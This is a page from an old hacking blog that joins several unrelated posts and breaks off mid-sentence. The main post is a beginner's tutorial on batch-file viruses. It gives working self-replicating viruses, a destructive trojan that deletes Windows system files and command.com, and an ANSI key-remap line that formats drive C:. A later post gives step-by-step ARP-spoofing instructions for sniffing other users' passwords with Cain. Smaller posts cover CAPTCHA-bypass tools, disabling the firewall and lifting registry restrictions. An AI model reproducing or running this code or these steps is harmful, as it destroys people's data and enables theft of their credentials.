Simple - Batch - File - Viruses - Explained

Simple - Batch - File - Viruses - Explained!

by LINUX_PIR8



Part 1: Introduction





This document is written for lamerz in batch language. This explains the true basics of batch file programming. Even experienced programmers could probably learn a thing or to from this document. Now back in the good old days batch files were quite popular among virus writers because of the sheer simplicity of them. But people now days have been guided to Pascal, Delphi and C++. Those mentioned are very good and powerful programming languages but I don't know about you but I think they are boring and hard to cope with. Batch is the language for YOU! Simple to pick up and powerful at the same time. Now if you want to learn batch then keep reading other wise go back to watching Eastenders. Ok people you are the chosen ones.... Continue to the next part.







Part 2: Basic commands



Now there are loads of commands you should already know which are used in DOS. But if you dont know DOS I suggest you go get a book out from your local library and read your ass off because that is the only way to learn.



Commands listed below I hope you should already know: -



Command.com

Find.exe

Choice.com

Attrib.exe

Mem.exe

More.com

Sort.exe



Filz you should know about are: -



Autoexec.bat (especially this one would help)

Config.sys

Msdos.sys

Tmpdelis.bat

Dosstart.bat

win.ini

System.ini



Now filz such as these will help you in your understanding of batch language.



I will explain what each one does and how it can be used, are you ready...-



Command.com = the command interpreter, dos needs this to function!

Find.exe = can be used to search through almost anything for anything! (More on that later)

Choice.com = used for menu system functions e.g. a/b/c?

Attrib.exe = sets attributes on filz to make them read only or hidden

Mem.exe = Tells you about memory resources

More.com = More on this later :)

Sort.exe = Sorts data (not to sure on this one)

Autoexec.bat = start-up file processes functions and drivers needed

Config.sys = start-up file processes functions and drivers needed

Msdos.sys = same as above but go look in this one, it is interesting, go on play a little.

Tmpdelis.bat = is a windows batch file go look inside for more info...

Dosstart.bat = windows batch file used for dosprompt to load.

Win.ini/system.ini = windows initiation filz play with these and say good by to Winblows 95/98/NT



Heres some more details about some of the DOS commands:



FIND.EXE = This command is very powerful indeed. Yet to the everyday ignorant user this file means nothing! This file can search through files for specific words, through memory for specific files (tsr's) and through the bios for date, time day etc... This means i could if i wanted to see what the date is and if it is my specified date i could make my virus activate. You see where i am coming from now? It is a very powerful tool, for good and bad! In respect to the good side you could use this program to search through memory to find specific viruses such as the stoned and aircop virus, thus a virus detector!



CHOICE.COM = This file is not bad at all. It is for mainly menu systems in batch files, but can be used in other ways if the user wishes to. For instence this program can tell the difference between yes and no. It also has a delay sequence that you can activate, thus using it for timed viruses, e.g. Your Pc is going reset in 10 seconds.

This is a useful tool in viral programming, because you can get the user to activate the virus, by just pressing a key.



ANSI.SYS = This file is widley used in BFV's, it has unlimited use. Its main ability is that it can redirect keys to do commands, for example i could program the [a] key to format the hard drive. This is so powerful and dangerous, because it is so easy to do:



Prompt $e[97;"echo Y| format c:/u >nul";13p



Just that line could destroy the whole hard drive with out the user knowing. To use Ansi.sys it must be loaded into memory through config.sys file.



ATTRIB.EXE = This file is used in DOS for putting attributes on files making them read-only and/or hidden. Great concealment for bfv's.



Each command is some where along the line used in batch filz. But not all the time because they are not needed. For instance a simple batch file below, which asks the user to enter a password, needs no commands just pure batch language.



@Echo off

echo Enter password then [F6] and then smack the [Enter] key real hard!

prompt $e[30m

echo on

echo off

copy con password.dat>nul

prompt $e[0m

echo on

echo off

cls

copy password.set+password.dat password.bat>nul

call password.bat

if '%password%=='r3dhat goto done

echo Incorrect, you are not trying to break into my pc are you?

choice /t:y,3

if errorlevel 2 goto next

:next

erase password.bat

erase password.dat

:hello

cls

echo Turn off PC

goto hello

:done

erase password.dat

erase password.bat

set password=

prompt $p$g



Simple batch file, which asks the user for a password, and if they type it incorrect then the program will put them in an endless loop! Simple but effective. Other features; are that when typing the password the text colour is set to black so you cant see it then it resets the colour back to normal when finished. Erm...what else? Oh yeah it makes two files puts them together to make another batch file then runs it to set a variable into memory, then the password.bat file will look in memory to check what the user wrote to see if it is correct. Good thinking hey! Well experiment with this one can be interesting. Any bugs or improvements email me at linuxpir8@yahoo.com







Part 3: Viruses Explained



Now lets get one thing clear! A virus is not a program that gets on your hard drive by magic and then formats it.



A virus is a program, made to replicate/copy itself from one file to another. It can not infect files unless you RUN it! Most viruses come off disks or the NET and the user doesn't even realise until his MICROSOFT software decides it doesn't want to work anymore. (I THINK IT MIGHT BE BEST TO MENTION THAT I HATE MICROSOFT AND THE ONLY GOOD THING THAT HAS COME OF THEM IS MSDOS!)



Now despite my hatred towards Machosoft, i think that most viruses are aimed at Windows/x these days due to the mass numbers that use the O/S. But remember where there is Windows there is MSDOS!!! And where there is msdos there are batch filz and where there are batch filz there are my viruses.



A simple diagram: -



xxxxxxxxxxxxxx xxxxxxxxxxxxxx

x Mat156.bat x x mat156.bat x

xxxxxxxxxxxxxx xxxxxxxxxxxxxx

v virus v

vvvvvvvvvvvvvv

^^^^^^^^^^^^^^ ^^^^^^^^^^^^^^

uninfected infected



That is the difference between the infected and the uninfected in batch filz.







Part 4: Simple Batch File Virus



Below I'm going to make up a virus then explain how it works. OK here goes....



Virus.bat



@echo off

ctty nul

for %%f in (*.bat) do copy %%f + virus.bat

ctty con



Thats it, simple infection routine that infects all batch filz in the current directory. This kind of infection is not popular among virus writers due to the way it infects. This virus will not only infect itself, but if it cant find anything to infect it will loop and re-infect all other batch filz all over again until all the memory or system resources are taken up. This is a bug but also a feature. It just appends itself on any batch file, lame but somewhat effective if used in the correct context. Try it out and play with it, as no real damage can occur. Mind you it is very quick, so if you leave it for ten seconds it probably will have infected other batch filz about 600 times. Batch file viruses are very fast. Im am now going to attempt to explain what each line does: -



@echo off - turns off the commands written in the program so the user cannot see what you are typing.

ctty nul - disables the keyboard and screen output, meaning you cant stop the virus unless you turn off your PC.

for %%f in (*.bat) do copy %%f + virus.bat - this puts the virus in all batch files in the current directory.

ctty con - re-enables the keyboard and the screen display.



Hope fully you understood all that and you are ready to go onto something more advanced.







Part 5: Advanced programming



OK here is the technical stuff. Variables! We set variables so that we can identify stuff. E.g.



set virus=*.bat



That command means that I can now say virus instead of *.bat. Meaning I can now say infect virus, instead of saying infect *.bat. May seem pointless but in the context that variables are used in it can be very powerful. Below is a virus that uses variables to infect: -



@ctty nul.LR

for %%a in (*.bat) do set LR=%%a

find "LR"<%LR% if errorlevel 1 find "LR<%0>>%LR%

ctty con.LR



This virus uses the variable LR to identify the batch file to infect. Now I will try to explain what this virus is doing in the simplest terms I can, ok you ready? Right this virus will disable the keyboard then search through all the batch filz until it reaches the last one, then it sets the variable LR to the last batch file found, ok so far so good. So now we have a variable assigned to a file. Then it searches through the file for the Key string (variable) LR and if it has it in there it wont infect it again but if it doesn't it will goto the next line. This is where the infection takes place. The virus finds the key string which you should have now guessed is LR which is on every line of the virus and then it finds the letters LR from %0 which is the current file normally the virus, and then gets all the lines with LR on them and inserts them into the file that the variable was assigned to earlier. Finally the virus then enable the keyboard for the user. Badly explained I know but try it out and put a few pause marks in the file and watch what it does! Suprisingly simple. This program is covered more clearly in my article about batch file viruses.







Part 6: Programs made in batch



I have not made that many programs in batch but use your imagination and you can. For example I earlier showed you the password file, I have also made a batch file virus remover, but what I haven't made is a virus detector. My friend at my college gave me the challenge to make a batch file that detects viruses or destructive commands so me and my big mouth took him up on the idea and came up with a lame program. Searches memory for popular memory resident viruses on a small scale, this could be enlarged to any number of viruses!



@echo off

echo [1] Stoned virus

echo [2] Aircop virus

choice /c:12

if errorlevel 2 goto aircop

:stoned

mem /c|find /i "stoned!" >nul

if errorlevel 1 goto no_virus

:virus

echo Sorry to inform you but you are infected with the stoned virus!

goto done

:no_virus

echo Congratulations man you are clean

:aircop

mem /c|find /i "Aircop" >nul

if error level 1 goto no_virus2

:virus

echo You have the Aircop virus.....Unlucky!

goto done

:no_virus2

echo You lucky son of a bitch no virus found!

:done



Very lame technique but if used on a larger scale it works really well and it tells you how much system resources the virus has taken up as well!



Alrighty then on to the real challenge, searching for destructive commands within BAT, COM, and EXE files. I did not make this program!! But phuck me it works!



@echo off

if '%2=='Loop goto loop

echo *** ANSI/BATCH SCANNER ***

set mask=%1 %2 %3 %4 %5 %6 %7 %8 %9

if '%mask%==' set mask=*.*

for %%f in (%mask%) do call %0 %%f Loop

goto done

:loop

if not exist %1 goto done

set line=

:: escape and tab characters

set esc=

set tab=

find "%esc%["<%1>nul

if not errorlevel 1 set line=%line%EscSeq

find /i "$e["<%1>nul

if not errorlevel 1 set line=%line%PromptSeq

find ";13p"<%1>nul

if not errorlevel 1 set line=%line%KeyRedef

if '%line%==' goto checkbad

find """p"<%1>nul

if not errorlevel 1 set line=%line%Key2

set hit=0

find "0p"<%1>nul

if not errorlevel 1 set hit=1

find "1p"<%1>nul

if not errorlevel 1 set hit=1

find "2p"<%1>nul

if not errorlevel 1 set hit=1

find "4p"<%1>nul

if not errorlevel 1 set hit=1

find "5p"<%1>nul

if not errorlevel 1 set hit=1

find "6p"<%1>nul

if not errorlevel 1 set hit=1

find "7p"<%1>nul

if not errorlevel 1 set hit=1

find "8p"<%1>nul

if not errorlevel 1 set hit=1

find "9p"<%1>nul

if not errorlevel 1 set hit=1

if %hit%==1 set line=%line%Key3

:checkbad

find /i "DEL "<%1>nul

if not errorlevel 1 set line=%line%Del

find /i "DELTREE"<%1>nul

if not errorlevel 1 set line=%line%Deltree

find /i "DEBUG"<%1>nul

if not errorlevel 1 set line=%line%Debug

find /i "ATTRIB "<%1>nul

if not errorlevel 1 set line=%line%Attrib

find /i "FORMAT C:"<%1>nul

if not errorlevel 1 set line=%line%Format

find /i "*.BAT"<%1>nul

if not errorlevel 1 set line=%line%BAT

find /i "*.EXE"<%1>nul

if not errorlevel 1 set line=%line%EXE

find /i "*.COM"<%1>nul

if not errorlevel 1 set line=%line%COM

echo %1 %tab%%line%

:done

set mask=

set line=

set hit=

set esc=

set tab=







Part 7: Viral writing groups



There are plenty of virus writing groups around but they all seem to be in it for fame? People that inspired me where Dark Avenger - who could program any batch file to do any thing!! Hellraiser - who hates Bill gates, but at the same time has some really good ideas, and Lucifer Messiha - who really put the v into virus. These guys dont write anymore but if they did then the viral comunity would be bowing down to them. Viral writing groups are to competetive, they are good at what they do but seem to be complete idiotic adolescents. The time i joined a writing group i thought, oh yeah im good but the reality of it was that i was not writing viruses for fun but i was writing viruses to compete. If you get to the stage that you can program a virus and you want to join a viral group then just remember the fun side of it, do it for yourself. I dont know if you've every heard of Rock Steady, but he wrote loads of viruses (destructive ones) and gave them to John mcaffee pretending he was a victim of this virus. This would then get the virus noticed and the anti virus program makes his virus well known, but at the same time it can be cured. Whta i mean is once you send in a virus the next anti-virus John brings out with have info on Rock Steadys virus. Is it worth it? He is a glory creator! By the way he turns out to be only 15 years old!!! Thats pritty much it on virus writing groups, lets now move on and go to ethics and moral matters concerning viruses.







Part 8: Ethics & morality



OK here is why i am always screwing at people about destructive viruses and trojans. Imagine yourself saving up a whole load of cash, and then buying a new software package. But to your dismay some little **** puts a destructive program on the package and it wipes your whole disk!!! Now if your hard drive contained the amount of valuable data that mine does, i tell ya you'll be pissed! imagine a whole years work from college on it being deleted! See my point. Most people that do make these programs are beginners trying to show off there power, more often than not they are lamerz! Any one can make a program to del all files (erase *), simple stuff. Now the only time destruction pops into my mind is if i get expelled from college or sacked from work i might be tempted to leave a logic bomb on a pc that went off on my bosses birthday or something. But never for nothing, its just not worth it. Alright thats enough of me blabbing on read the rest of this document and enjoy!







Part 9: Trojan story and programming Trojans



It all started off years ago, when two tribes went to war, one tribe lost. This tribe how ever never gave up, they sent a big wooden horse (trojan horse) as a token of there defeat, so when the winning tribe opened there gates and took in the horse the lost tribe jumped out from a secret hatch in the horse and defeated the tribe, thus winning in the end. They only won from concealment.



Now trojans are destructive programs that are made to look like they do good. Now programming trojans is easy but fooling the user takes the mind of a genius. This is how i would do it. I would make a trojan called setup.bat then i would make ten text filz and rename tham all to .DAT filz and pretend the package is a game. Once they run the setup.bat....BOOM trojan loaded and say goodbye. Programming trojans is easy, but getting caught is even easier. You have to make a trojan that can not only destroy filz but also destroy all traces of itself. Here is my program of how i would do it.

@echo off cd\ if exist c:\windows goto winslows if exist c:\dos goto do$ :poof erase * goto end_trojan :winblows cd\windows if exist system.ini del system.ini if exist win.ini erase win.ini ren *.exe *.vxe ren *.dat *.cat ren *.sys *.sex goto end_trojan :do$ cd\dos ren *.com *.kom ren *.exe *.com ren *.kom *.exe if exist c:\command.com erase c:\command.com :end_trojan erase trojan.bat



Extreme basics, but i tell you this would mess up your Windows system for good and Dos would have to be re-installed. Trojans are easy though, so stick to viruses and have PHUN! :)







Part 10: Endless loops for fun?



This bit is lame but what the hey this document is aimed at the lame.(no offence). Here are some simple programs which just loop:-



:loop

dir /s

goto loop



The above displays all the filz on the hard drive and dont stop!



:loop

echo Hello world my name is loopy loo!

goto loop



This one will make the text scroll down the page



@echo off

:poo

cls

echo Loopy loo needs a poo!

pause bell^G^G^G

goto poo



That one beeps in the pc and displays the text.



ok that should be enough. Read the last bit and then goto bed!







Part 11: BFV removal



These batch viruses work by adding code to the beginning and/or the end of the infected BAT files. The extra code can be removed by loading the infected batch into EDIT and deleting the additional lines. Some will create a hidden copy of themselves in the root (or other directory), use ATTRIB filename -s -r -h followed by DEL filename, filename being the actual name of the virus file. The command DIR /AH /S will show all hidden files on a drive.



Here is the code for a batch file virus remover:



@echo off

if '%1=='%temp% goto remove

echo BFV-remover version 1.0

echo =======================

echo ÿ

:start

echo ************** Batch File Virus Remover ****************

echo This will remove any batch file virus if used correctly.

echo BFV-remover will destroy batch files if they do not have

echo a virus!!! So please read the instructions first.

echo Made by l33 Rumbl3

echo ÿ

set ks=%1

set is=%2

if '%ks%==' goto exit

if '%is%==' set is=%ks%

if '%temp%==' set temp=C:\

echo Will remove %ks% from files containing %is%. Proceed?

choice /c:yn>nul

if errorlevel 2 goto exit

for %%v in (*.bat) do call %0 %temp% %%v

if exist rem$$_ del rem$$_

goto exit

:remove

find "%is%"<%2>nul

if errorlevel 1 goto done

echo Found in %2 - remove?

choice /c:yn>nul

if errorlevel 2 goto done

find /v "%ks%">%2>rem$$_

copy rem$$_ %2>nul

goto done

:exit

set is=

set ks=

:done



This program removes viruses that have a unique key, such as the pot virus and the zep virus, although both these viruses do no harm they still are a threat to your data. The major advantage about this program is that it will abstract the virus from the file so that you do not have to delete the file.



This is for batch file viruses only!! It does not work on COM or EXE files!!



Warning! If key is not unique this will destroy files!



Usage:



CLEANBAT Key1 [Key2]



...where Key1 is the UNIQUE signature used by the virus and Key2 is an identifying string. If not specified then Key2 is set to Key1



eg. to kill the skul virus goto DOS and:



type: clean skul



..and that is it, easy, look in your batch files and see if you have any thing out of the ordinary such as the words infect/vir/a certain date.

Read More

Sniffing with CAIN

Sniifing with Cain and Abel

What is Cain & Able ?
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. (taken from their website)

Download Link :- http://oxid.netsons.org/download/ca_setup.exe (sometimes the link doesn't work)

Softpedia link :- > here <

This tutorial is meant for sniffing only there are a lot other things you can do with cain as mentioned above

How to sniff with CAIN
Step 1:- Install Cain and Launch it

Step 2:- Click on Sniffer tab


Step 3:- Activate the sniffer by clicking 2nd icon (seems like micro chip -- tooltip says Start/Stop Sniffer) from the left on top bar

Step 4:- Click on blue coloured Plus icon to scan for MAC address on LAN or simply right click ->scan MAC address


Step 5:- Click OK on the next window that comes -> CAIN is told to scan all the host in our subnet


Step 6:- Click on APR tab at the bottom


Step 7: Now Click on the Plus sign again at the top to add Computers to sniff on . A windows will pop up . In that windows . Select the router/gateway of your lan on the left side and the computer you want to sniff on the right side. Mostly the gateway is the one with ending octet 1 eg. 10.10.10.1 or 10.129.71.1 as in my case. Ususally last no. is 1




Step 8:- Now you'll see the computers are added to the list. Click on 3rd icon from the left on the top which is like has a biohazard sign . You'll see something like this



Step 9:- Step back and relax and let cain do its work you'll see passwords rolling in passwords tab.(click it to enter password)

well its 3 in the morning and i don't think anyone else is online besides me so this picture does't show you any passwords


Suggestions and Feedbacks are appreciated

Read More

Some Serious Hacking Tools Around for begginers

Here are some pics of some simple and basic hacking tools used by some Novice and just starting out "crackers" out there.There is no need for unix,linux stuff & other computing thing to use it.just have the tools & there u goes. These thing should not be out there but "meron kasing makukulit na "want to see other info not their own. These are backdoor program (trojan spy gen) and some hacking stuffs..used for stealing your passwords -"password lang naman ng..ie..yahoo id nyo" using the the 3rd of the possible way list below..

• NetBIOS
• ICMP Ping
• FTP
• rpc.statd
• HTTP

there is more out there..laging i improve ur comp security and screen your sources olways specially in ur email..
We must always remember "Hacking is stealing and stealing is a Crime".

Read More

Tools to Automate RapidShare Downloading for Free Users With No CAPTCHA

RapidShare CAPTCHA has always been hacked no matter how tough they made it. Usually whenever RapidShare updates their CAPTCHA, it only took a few days for third party download tools to auto recognize it. One of the toughest CAPTCHA was with cats and dogs in them and it took 3-4 weeks to be cracked. A few days after the cats and dogs CAPTCHA has been cracked, RapidShare installed a new CAPTCHA system called TEABAG_3D.




The TEABAG_3D is developed by OCR Research Team and they are a bunch of CAPTCHA hackers too. They claim that after defeating several CAPTCHAs, they decided to make a CAPTCHA which is hard to break. I’ve been in communication with the developers of CryptLoad and jDownloader to keep track of the progress in defeating the latest 3D CAPTCHA in RapidShare. They were in 50% progress and suddenly RapidShare decided to eliminate the captchas to simplify the use of RapidShare’s free services significantly but with a catch that the download speed limit has been limited to 500kilobits per second, that is only 62.5KBps.

1. CryptLoad

- The interface is in English and configurations is not complicated. Other than downloading from RapidShare, it can also support downloading from many other One-Click hoster such as megaupload, gigasize, depositfiles and etc. Currently CryptLoad can only run on Windows with Microsoft .NET Framework and the next major update version 2 should support Mac OS and Linux as well. Supports automatic updates.
[ Download CryptLoad ]

2. JDownloader
- This tool has not been mentioned here before but I now tell you that this is a really good downloading tool for one-click-hosters website. JDownloader is open source, platform independent and written completely in Java. It simplifies downloading files from One-Click-Hosters like Rapidshare.com or Megaupload.com - not only for users with a premium account but also for users who don’t pay. It offers downloading in multiple parallel streams, captcha recognition, automatically file extraction and much more. Of course, JDownloader is absolutely free of charge. Additionally, many “link encryption” sites are supported - so you just paste the “encrypted” links and JD does the rest. Because it is written in Java, you can run JDownloader on Windows, Mac OS and Linux. Support automatic updates. Try it and you’ll love it!

[ Download jDownloader ]

3. CandiSoft Load!
- Load! also has not been mentioned at this blog before. The interface is in German but it shouldn’t be too hard to understand as some words are pretty similar to English. You can always make use of Google Translate to help you translate from German to English. Runs on Windows and supports automatic updates. It also supports other one-click-hosters such as megaupload, netload.in, uploaded.to and etc.
[ Download CandiSoft Load! ]


4. RS Downloader
- This tool has been mentioned at this blog before and the interface is in German. It runs on Windows, supports automatic updates and can only download from RapidShare. Can also automatic decrypt and recognized encrypted rapidshare links using YouCrypt plugin.
[ Download RS Downloader ]

5. Universal Share Downloader (USDownloader)
- USDownloader is another popular and powerful one-click-hoster download manager. It supports a lot of free hosting services, including the most popular ones like RapidShare, MegaUpload or YouSendIt. You can select up to 26 types of languages for the program’s interface and it runs on Windows. When want to do an update on USDownloader, you’ll have to use the server http://usd.cap-cap.ru/ because the one in the list doesn’t work.
Download USDownloader ]

source: raymond.cc

Read More

Speed up your torrents

1. Cap your upload (most important)

Limit your upload speed to approximately 80 percent of your maximum upload rate. You can check your upload speed over here (never trust your isp). Once you know your maximum upload speed, change the max upload (to 80%) speed in your torrent client’s preferences.

Don’t get me wrong, everyone should share as much as possible, but if your upload rate reached it’s max, your download rate suffers significantly.

2. Hack the max TCP connections

If you’re on XP sp2, your TCP connections are limited to a maximum of 10. This seriously hurts your downloading speed because it wont let you connect to a high amount of ip numbers. It is supposed to slow down viruses because their spreading strategy is to connect to a high amount of ip numbers, but it also cripples your torrent downloads.
A nice way to fix this is to download this patch, it allows you to set the maximum allowed connections to any number you want. Any number between 50 and 100 is ok (more on this).

3. Check seeds and peers

A simple tip, but o so important. Always look for torrents with the best seed/peer ratio. The more seeds (compared to peers) the better (in general). So 50 seeds and 50 peers is better than 500 seeds and 1000 peers. So, be selective.

4. Change the default port.

By default, BitTorrent uses a port 6881-6999. BitTorrent accounts for a lot of the total internet traffic (1/3), so isp’s like to limit the connection offered on the these ports. So, you should change these to another range. Good clients allow you to do this, just choose anything you like. If you’re behind a router, make sure you have the ports forwarded or UPnP enabled.

5. Disable Windows Firewall

It sucks. Windows Firewall hates P2P and often leads a life of it’s own. So disable it and get yourself a decent firewall, Kerio or Zone Alarm for example.

Last but not least… Buy a faster connection…

Read More

Track Your Stolen Laptop With Adeona For Free

Adeona is open source software to system used to securely and privately track the location of your Windows, Mac, or Linux laptop.

What makes Adeona stand out, even from proprietary solutions, is it’s ability to securely transmit the location data preventing 3rd parties from also gathering the information.

Keep in mind that Adeona is still in beta, so don’t expect a perfect program just yet. Please do report any bugs that you might find.

Installation methods differ between operating systems so be sure to read the download instructions.

One interesting question from the FAQs:

Can I install this on my girlfriend or boyfriend’s computer and track her or him, and perhaps get pictures of them while they’re doing certain activites?

Yes. Like all technologies, Adeona has the potential for being abused. However, if you are malicious enough to want to do the above, there is probably other software available out there more suited for your needs. (We won’t provide links to these more malicious tools.)

Adeona seems to be a good solution to give you a piece of mind that if your laptop gets stolen, you might have a chance to retrieve it.

If you have any other suggestions for software to track your stolen laptop, please let us know in the comments as always.

Read More

Useful Tricks and Securing your Ftp

Getting Ip's:--



To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).

Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.

Type netstat -r at the command prompt to see the ip of all computers you are connected to



In MSN (and other programs) when you are chatting to someone everything you type goes through the MSN servers first (they act as a proxy) so you see their ip rather than who you are chatting to. You can get round this by sending them a file as MSN doesn't send file through its proxy.

When you type the netstat -r (or -a for a different view) the ip's are under the foreign address table. The ports are separated by a : . Different programs use different ports, so you can work out which ip's are from which program.

Connecting to other computers and what ports are:--



Servers send information. Clients retrieve. Simple.

Windows comes with a built in program to connect to other computers called telnet.

To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system

Ports are doors into computers. Hosts are computer names

(ip number or a name that is translated into the ip automatically)

Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:

11 :- Sends info on the computer

21 :- FTP (File transfer program)

23 :- Telnet (Login to the computers command line)

25 :- Smtp (Sends mail)

80 :- Http (Web pages)

There are thousands of different programs using different ports. You can get programs called port scanners which check a computer for all ports up to a certain number, looking for ways in. You can port scan a computer looking for ways-in.

Anyway, back to telnet.

Type http://www.yahoo.com as the host and port as 80 the click connect.

If nothing happens, you're in. Wow. You are connected to Yahoo's server.

You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.

Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)

Allowing dos and regedit in a restricted Windows



See http://blacksun.box.sk/tutorials/format....ndows.html for some very cool tactics.

A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp]

"Disabled"=dword:0

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]

"DisableRegistryTools"=dword:0



Save it as something.reg then run it. Simple.



Making non deletable, unreadable folders



Tested on Windows 95/98

By holding down alt, then typing numbers on the number pad (right of the keyboard) you can create special characters. If you hold down alt, then press 1, then let go, you got the ascii character 1. You try some random numbers. This goes all the way up to 255. Open a dos prompt, and type md (alt+1+9+4)some word. md is the dos command to make a directory, now try and open the directory in Windows, you can't. To open it, type ren (alt+1+9+4)some word some word (ren is the dos command to rename)



Proxies



Proxies are computers that you connect through, hiding your computer. Most aren't anonymous, they give away your ip. Some are. Good anonymous proxies: mail.uraltelecom.ru:8080 and 194.247.87.4:8080.

Different programs require different ways of using proxies. To do it in internet explorer 5 go to tools, internet options, connections, settings. In the above proxies they are in the format host:port



Password files

If you lock yourself out of Windows stuff, all passwords are stored in files called *.pwl in C:windows. In Unix, passwords are normally stored at etc/passwd. This can be viewed using the cat command (prints a file to screen): cat etc/passwd. Make sure you're passwords are shadowed (not actually in etc/passwd). Also make sure they aren't in a file called shadow, especially not in a file called etc/shadow.

Unix passwords are encrypted far better than Windows one's (to be fair, Windows 95 isn't designed for users), but can still be cracked through a program called jon.



Securing your website

Ftp Ftp is how you upload your web site, if someone finds out the password they can add/ delete anything. Brute forcing is the most common ftp attack, where a program guesses every possible combination (or from a list of words). An eight letter alpha-numeric word is almost impossible to crack, as the process is slow.

The real problem is with server side scripting. Pages other than plain html (ie. pages that perform commands on the host) are a security risk. The main problems are scripts that write to pages (guest books etc.). If when the guest book is viewed it has a .shtml extension, then it can execute commands. Eg. a malicious visitor could place

---

Everything happens for a reason, If you didn't make the decisions you made then. You wouldn't be who you are today.

Always Remember...

No Regrets!

Read More